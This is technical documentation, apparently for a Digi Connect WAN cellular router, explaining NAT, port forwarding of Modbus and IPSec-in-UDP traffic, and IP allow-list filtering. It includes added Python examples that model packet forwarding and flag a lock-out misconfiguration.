NAT hides the private Ethernet IP addresses of the devices connected behind the Connect WAN's Ethernet port. The application can then only send polls to one IP address, the mobile IP, in this case 166.213.229.218.
TCP port forwarding is used to forward the IP polls to one or more devices on the Connect WAN Ethernet port.  Different TCP port numbers are used to designate which device gets the proper traffic. The application must be able to support changing the TCP protocol port number from the default of 502.  In this case the application is configured to poll according to this table:
Remote Device   Destination IP Address   Destination TCP Port
One             163.213.229.218          12001
Two             163.213.229.218          12002
Three           163.213.229.218          12003
Notice the destination IP address is the Connect WAN's mobile IP address.
The Connect WAN is configured with a TCP/UDP forwarding table as follows:
Source TCP Port   Destination IP Address   Destination TCP Port
12001             192.168.1.2              502
12002             192.168.1.3              502
12003             192.168.1.4              502
Incoming traffic is then routed to the proper device.  The devices can use their standard TCP port of 502.
The main issue with port forwarding in this case is when the polling application does NOT allow the user to specify the TCP or UDP port used.  The workaround is to use routers that support GRE, VPN, or other forms of tunneling that can be forwarded through the Connect WAN.
Another example of port forwarding is forwarding of IPSec-in-UDP traffic to a VPN appliance or router attached to the Connect WAN's Ethernet port. Figure 1 above shows a GRE tunnel. In much the same way, IPSec traffic can be encapsulated in UDP to prevent NAT from modifying the IPSec headers (which would invalidate the traffic). IPSec-in-UDP implementations always use UDP port 500 for IKE/ISAKMP, but can use various UDP port numbers for the AH/ESP traffic. Here is an example of UDP port forwarding entries on a Connect WAN for IPSec in UDP:
Protocol   Source Port   Destination IP Address   Destination Port
UDP        500           192.168.1.2              500
UDP        4500          192.168.1.2              4500
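To make the NAT, GRE forwarding and port forwarding rules above concrete, here is an added example (not Digi's code and not part of the original article) that models how the Connect WAN decides where a packet goes: outbound traffic is rewritten to the mobile IP and remembered in a translation table, replies are matched against that table, unsolicited traffic is delivered only if a port forwarding entry matches, GRE (protocol 47) is passed to the configured router without being terminated, and anything else is dropped. The mobile IP 166.213.229.218, the GRE target 192.168.1.2 and both forwarding tables are taken from the page; the public hosts 203.0.113.10 and 198.51.100.5, the port pool starting at 40000 and the list of services the device answers itself (HTTP, telnet) are assumptions for the example.

```python
# Added example (not Digi's code): a small model of how the Connect WAN's NAT,
# GRE forwarding and TCP/UDP port forwarding decide where a packet goes.
# Addresses and forwarding tables come from the page; 203.0.113.10 and
# 198.51.100.5 are constructed test addresses.
from dataclasses import dataclass, replace
from typing import Optional, Tuple

PROTO_TCP, PROTO_UDP, PROTO_GRE = 6, 17, 47  # IP protocol numbers


@dataclass(frozen=True)
class Packet:
    proto: int
    src_ip: str
    dst_ip: str
    src_port: int = 0  # GRE has no ports; 0 means "none"
    dst_port: int = 0


class ConnectWAN:
    # Services the device itself answers on the mobile interface (assumed: HTTP and telnet).
    LOCAL_SERVICES = {(PROTO_TCP, 80), (PROTO_TCP, 23)}

    def __init__(self, mobile_ip, gre_forward_to=None, port_forwards=None):
        self.mobile_ip = mobile_ip
        self.gre_forward_to = gre_forward_to            # Ethernet host that receives GRE (proto 47)
        self.port_forwards = dict(port_forwards or {})  # (proto, mobile port) -> (private ip, port)
        self._by_private = {}    # (proto, private ip, private port) -> public source port
        self._by_public = {}     # (proto, public source port) -> (private ip, private port)
        self._next_port = 40000  # assumed port pool for translated connections

    def outbound(self, pkt: Packet) -> Packet:
        """Mobile-initiated traffic: the source becomes the mobile IP and the mapping is
        remembered so the reply can be sent back to the right private host."""
        key = (pkt.proto, pkt.src_ip, pkt.src_port)
        if key not in self._by_private:
            self._by_private[key] = self._next_port
            self._by_public[(pkt.proto, self._next_port)] = (pkt.src_ip, pkt.src_port)
            self._next_port += 1
        return replace(pkt, src_ip=self.mobile_ip, src_port=self._by_private[key])

    def inbound(self, pkt: Packet) -> Tuple[str, Optional[Packet]]:
        """Mobile-terminated traffic. Returns ("forward", rewritten packet) when it is passed
        to the Ethernet side, ("local", pkt) when the Connect WAN answers it, or ("drop", None)."""
        if pkt.dst_ip != self.mobile_ip:
            return "drop", None
        if pkt.proto == PROTO_GRE:
            # Passed through to the router (only the destination changes); never terminated here.
            if self.gre_forward_to:
                return "forward", replace(pkt, dst_ip=self.gre_forward_to)
            return "drop", None
        # 1. Reply to a connection a private host opened: consult the NAT table.
        hit = self._by_public.get((pkt.proto, pkt.dst_port))
        if hit:
            return "forward", replace(pkt, dst_ip=hit[0], dst_port=hit[1])
        # 2. Unsolicited traffic that matches a port forwarding entry.
        hit = self.port_forwards.get((pkt.proto, pkt.dst_port))
        if hit:
            return "forward", replace(pkt, dst_ip=hit[0], dst_port=hit[1])
        # 3. Configuration/monitoring traffic for the Connect WAN itself.
        if (pkt.proto, pkt.dst_port) in self.LOCAL_SERVICES:
            return "local", pkt
        # 4. Everything else is blocked by NAT: there is no private host to deliver it to.
        return "drop", None


def build_example_device() -> ConnectWAN:
    """The page's configuration: GRE to the HQ-facing router, Modbus polls and
    IPSec-in-UDP forwarded exactly as in the two tables above."""
    return ConnectWAN(
        mobile_ip="166.213.229.218",
        gre_forward_to="192.168.1.2",
        port_forwards={
            (PROTO_TCP, 12001): ("192.168.1.2", 502),
            (PROTO_TCP, 12002): ("192.168.1.3", 502),
            (PROTO_TCP, 12003): ("192.168.1.4", 502),
            (PROTO_UDP, 500): ("192.168.1.2", 500),
            (PROTO_UDP, 4500): ("192.168.1.2", 4500),
        },
    )


if __name__ == "__main__":
    wan = build_example_device()
    out = wan.outbound(Packet(PROTO_TCP, "192.168.1.15", "203.0.113.10", 51000, 80))
    print("outbound rewritten to", out.src_ip, out.src_port)
    print("reply ->", wan.inbound(Packet(PROTO_TCP, "203.0.113.10", wan.mobile_ip, 80, out.src_port)))
    print("Modbus poll on 12002 ->", wan.inbound(Packet(PROTO_TCP, "198.51.100.5", wan.mobile_ip, 40123, 12002)))
    print("unsolicited port 502 ->", wan.inbound(Packet(PROTO_TCP, "198.51.100.5", wan.mobile_ip, 40123, 502)))
    print("GRE from HQ ->", wan.inbound(Packet(PROTO_GRE, "198.51.100.1", wan.mobile_ip)))
```

The order of the checks in `inbound` is the security-relevant part: a poll sent straight to port 502 on the mobile IP is dropped because nothing maps it to a private host, which is exactly why an application that cannot change its destination port needs a tunnel (GRE or VPN) instead of port forwarding.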

IP Filtering
IP Filtering is a security feature that allows the user to block all incoming, mobile terminated traffic into the Connect WAN except for traffic from specific IP addresses and/or subnets.  There are three IP Filtering settings on the Connect WAN:
1. Only allow access from the following devices and networks. When checked, this blocks ALL incoming traffic except for the traffic from the IP addresses/subnets listed in the "allow access" tables.
2. Automatically allow access from all devices on the local subnet. This allows outbound traffic from the private Ethernet network out to the mobile network and beyond.
3. Allow access from the following devices and/or subnets. When the "Only allow access from the following devices and networks" box is checked, you must provide entries here to allow incoming mobile traffic to be passed through the Connect WAN.
CAUTION: Incorrect settings here can stop some or all traffic. For example, checking "Only allow access from the following devices and networks" without adding IP addresses or subnets to the "allow access" tables will block ALL incoming traffic, even responses to outgoing requests.
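The three settings and the CAUTION above, as an added example (not Digi's code and not part of the original article): a filter that evaluates a packet's source address against the allow-access entries, plus a configuration check that flags the empty-allow-list mistake before it is saved. The local subnet 192.168.1.0/24, the remote addresses and the reading that unchecking setting 2 keeps unlisted Ethernet hosts from reaching the mobile network are assumptions for the example.

```python
# Added example (not Digi's code): a model of the Connect WAN's three IP Filtering
# settings and a pre-save check for the misconfiguration the CAUTION warns about.
# The local subnet and the remote addresses are constructed for the example.
import ipaddress
from typing import Iterable, List


class IPFilter:
    def __init__(self, only_allow_listed: bool = False, allow_local_subnet: bool = True,
                 allowed: Iterable[str] = (), local_subnet: str = "192.168.1.0/24"):
        self.only_allow_listed = only_allow_listed    # setting 1
        self.allow_local_subnet = allow_local_subnet  # setting 2
        # setting 3: single hosts ("203.0.113.10") and subnets ("198.51.100.0/24") are both accepted
        self.allowed = [ipaddress.ip_network(a, strict=False) for a in allowed]
        self.local_subnet = ipaddress.ip_network(local_subnet, strict=False)

    def _listed(self, addr) -> bool:
        return any(addr in net for net in self.allowed)

    def permits(self, src_ip: str, inbound: bool) -> bool:
        """inbound=True: a mobile-terminated packet arriving from src_ip.
        inbound=False: a packet leaving the Ethernet side from src_ip."""
        addr = ipaddress.ip_address(src_ip)
        if not inbound:
            # Setting 2 lets the whole private LAN out; otherwise the host must be listed (assumed).
            return (self.allow_local_subnet and addr in self.local_subnet) or self._listed(addr)
        if not self.only_allow_listed:
            return True  # filtering off: NAT and port forwarding alone decide what gets in
        # With setting 1 checked nothing gets in unless listed, including replies to
        # outgoing requests, because the reply's source is the remote host, not the LAN.
        return self._listed(addr)


def audit(filt: IPFilter) -> List[str]:
    """Warnings a practitioner would want to see before saving the configuration."""
    warnings = []
    if filt.only_allow_listed and not filt.allowed:
        warnings.append("'Only allow access from the following devices and networks' is checked "
                        "but the allow-access tables are empty: ALL incoming traffic, including "
                        "responses to outgoing requests, will be blocked.")
    if not filt.allow_local_subnet:
        # Assumed consequence of setting 2's description, not stated verbatim by the vendor text.
        warnings.append("'Automatically allow access from all devices on the local subnet' is "
                        "unchecked: Ethernet hosts not in the allow-access tables will not be "
                        "able to send traffic to the mobile network.")
    return warnings


if __name__ == "__main__":
    # Polling host 198.51.100.5 and an HQ router at 203.0.113.10 are allowed in; nothing else is.
    good = IPFilter(only_allow_listed=True, allowed=["198.51.100.0/24", "203.0.113.10"])
    for ip in ("198.51.100.5", "203.0.113.10", "192.0.2.7"):
        print(ip, "inbound allowed:", good.permits(ip, inbound=True))
    print("LAN host outbound allowed:", good.permits("192.168.1.15", inbound=False))
    bad = IPFilter(only_allow_listed=True)  # the CAUTION case: box checked, tables empty
    print("reply from 203.0.113.10 with empty tables:", bad.permits("203.0.113.10", inbound=True))
    for w in audit(bad):
        print("WARNING:", w)
```

Running `audit` on the candidate configuration before applying it is the cheap check that catches the lock-out case; the filter itself shows why the lock-out happens, since a reply to an outgoing request still arrives with the remote host's source address and so must be listed like any other inbound traffic.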